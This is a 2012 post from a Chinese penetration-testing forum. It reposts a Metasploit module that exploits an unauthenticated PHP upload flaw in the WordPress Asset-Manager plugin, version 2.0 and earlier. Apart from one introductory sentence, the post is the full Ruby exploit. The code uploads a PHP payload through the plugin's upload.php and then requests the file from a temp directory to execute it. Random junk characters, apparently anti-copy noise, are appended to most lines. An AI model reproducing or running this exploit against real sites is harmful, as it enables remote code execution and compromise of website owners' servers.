找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
返回列表 发新帖
查看: 2554|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
5 _# [3 O9 J% A, t' W" V% F9 G4 G3 I% z- z3 i) p' o
##
  f8 Q+ V. F( D4 W: E$ L- {3 N" u# This file is part of the Metasploit Framework and may be subject to
1 d" n5 \8 P4 S# redistribution and commercial restrictions. Please see the Metasploit( ~9 Y* E* f" r
# Framework web site for more information on licensing and terms of use.9 P5 q' Q9 n2 X2 N: m- P
#   http://metasploit.com/framework/0 n. D4 R; P1 y: u' x
##
+ r9 q% r! w+ f/ ]5 l
/ J' l9 p# a- K' W9 b. urequire 'msf/core'
% {* O" g1 w4 k0 e. x. N0 mrequire 'msf/core/exploit/php_exe'! \: a# i9 X% L1 s# e; l* z* P
" }" i. G1 T- e3 P7 \
class Metasploit3 < Msf::Exploit::Remote8 r4 e: w: o- i) }
  Rank = ExcellentRanking
; F- C: V* V9 n . W+ S, K7 L  ^+ V% L3 N- a
  include Msf::Exploit::Remote::HttpClient
5 l7 {( Z/ z& Q  include Msf::Exploit:hpEXE
. f# a$ U3 v0 i) C, u" f: y
2 p" D  v. A1 F. g  @  def initialize(info = {})
5 ?* Q/ p4 t! G/ T( X+ f7 k! Z    super(update_info(info,
  O3 y. |3 E3 B' v4 s      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',
9 J$ ~5 _7 n' R% d* |$ f      'Description'    => %q{  N! a  C' J, P- o8 d
        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress+ x3 X2 J) R+ g1 S* l9 q
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a
4 ^" [0 _4 i/ C        temp directory without authentication, which results in arbitrary code execution.
8 }- u" a8 _: G8 s3 z0 Z% L% F& y      },- M. e/ R, `& [1 r3 l. v
      'Author'         =>& A9 t- ?0 v6 [+ ^
        [6 l6 F3 ?# O0 B6 c8 X! J
          'Sammy FORGIT', # initial discovery
& ~4 @3 r7 ]$ M          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
) v0 d5 p3 F4 j        ],  ^  f. s3 p4 G
      'License'        => MSF_LICENSE,) {  h3 ~; l0 O' \
      'References'     =>
. T" V& r& @( G9 h: z8 S        [
+ j/ ^5 h9 {. R3 X/ L; |          [ 'OSVDB', '82653' ],
* T3 i7 ~+ \$ I' Q4 z% `          [ 'BID', '53809' ],
7 z( W% F( g3 S* j. g5 @          [ 'EDB', '18993' ],
2 X: S* S. n. d' l& V$ x          [ 'URL', 'http:// www.myhack58.com /' ]
2 }* U+ [- H% s! C: Z0 I        ],- @3 S1 V2 w9 t+ ~! ?  D
      'Payload'       =>
/ X3 X0 P$ N. z* X+ _        {
' v' s! K2 I, `% x6 o# i4 ?# |          'BadChars' => "\x00",2 x+ x1 U/ q; m- }$ M
        },
; U; \! k1 M* n) i      'Platform'       => 'php',
0 A) r5 M2 J/ e# Z: n, Q      'Arch'           => ARCH_PHP,
7 z4 b4 a% z: I1 v$ e      'Targets'        =>  v: c) K( m4 a+ x: z! C9 x
        [$ b6 C/ Z8 M# M" l. V. D
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
/ V1 f) b7 v0 x3 F3 t          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
, `4 I! e9 g# L        ],
3 t7 r  {9 ]# X. H3 J      'DefaultTarget' => 0,8 d1 }5 ?& L2 s
      'DisclosureDate' => 'May 26 2012'))" q# W0 O" y# J
! R9 I' t$ b* ?( V. N$ F
    register_options(
$ B+ x- v( k9 [- u# P: x' e# p) r      [$ l% ]4 _& f( M+ H* ?7 E. ^2 Q
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
; d5 l8 Y% u% Q5 C, U/ |2 `      ], self.class)2 v6 f3 X" u6 v# Q
  end# I6 I! z' r; T( R, \

% `& G+ [$ h- q0 ~4 {+ {  def exploit
! M  @# w- V1 y$ c; U# _9 y    uri =  target_uri.path  Z; ~  E' F. Z2 X* R+ _
    uri << '/' if uri[-1,1] != '/'% b# \. @5 \9 N
    peer = "#{rhost}:#{rport}"5 H# u! h# [! V; U
    payload_name = "#{rand_text_alpha(5)}.php") D8 S7 a6 U8 u1 P
    php_payload = get_write_exec_payload(:unlink_self=>true)
* n. h. N/ C- X% Y/ G0 Z- Y   {* b. a: {& _! X0 B
    data = Rex::MIME::Message.new$ l8 V9 g8 p. S. i
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
/ h" H( m: F0 r3 ~    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')8 n" J( S- H1 M1 Y7 J

: ~6 O/ ^8 N" V. g$ D% D# ?( `7 M    print_status("#{peer} - Uploading payload #{payload_name}")9 K6 Z1 I' z5 c
    res = send_request_cgi({* J" @: h, _8 [0 B& W
      'method'  => 'POST',# y& B, z" k* l% R9 p8 V  b$ N
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",
! t, u3 B, f. g+ Z5 u# V      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
3 l" e8 s+ u- F- B- ]      'data'    => post_data7 g. b% l1 p( |
    })
5 Z$ u) M3 V/ b0 @  u, ~ + M- i, J+ s! M# E1 a
    if not res or res.code != 200 or res.body !~ /#{payload_name}/
+ h; F2 p& Y# Y5 {: _' I      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
- ~2 I* \' w1 q2 \' S" }end
, n, z% R/ \/ f+ b ( t- K6 _6 v+ z+ k  V% b
    print_status("#{peer} - Executing payload #{payload_name}")
  j) S# e) w) k    res = send_request_raw({
3 {2 ?6 M! T- n: `0 J) E9 \6 z      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",6 s) N9 t. @0 E3 t7 l( P
      'method'  => 'GET'4 w* u: M) {0 K+ X: C
    })+ Q$ O# R8 a0 c# h

' Y# S4 w3 G2 p4 G( w, f) x1 `5 M    if res and res.code != 200
7 N2 u* _1 ?& s      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
! |  l. R3 j; Z% h% J/ q3 Z0 n    end
$ }8 f9 @, R1 [; S* z  end
7 n( f. v, X6 g. Aend
9 s) Y% {5 J6 T, `
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表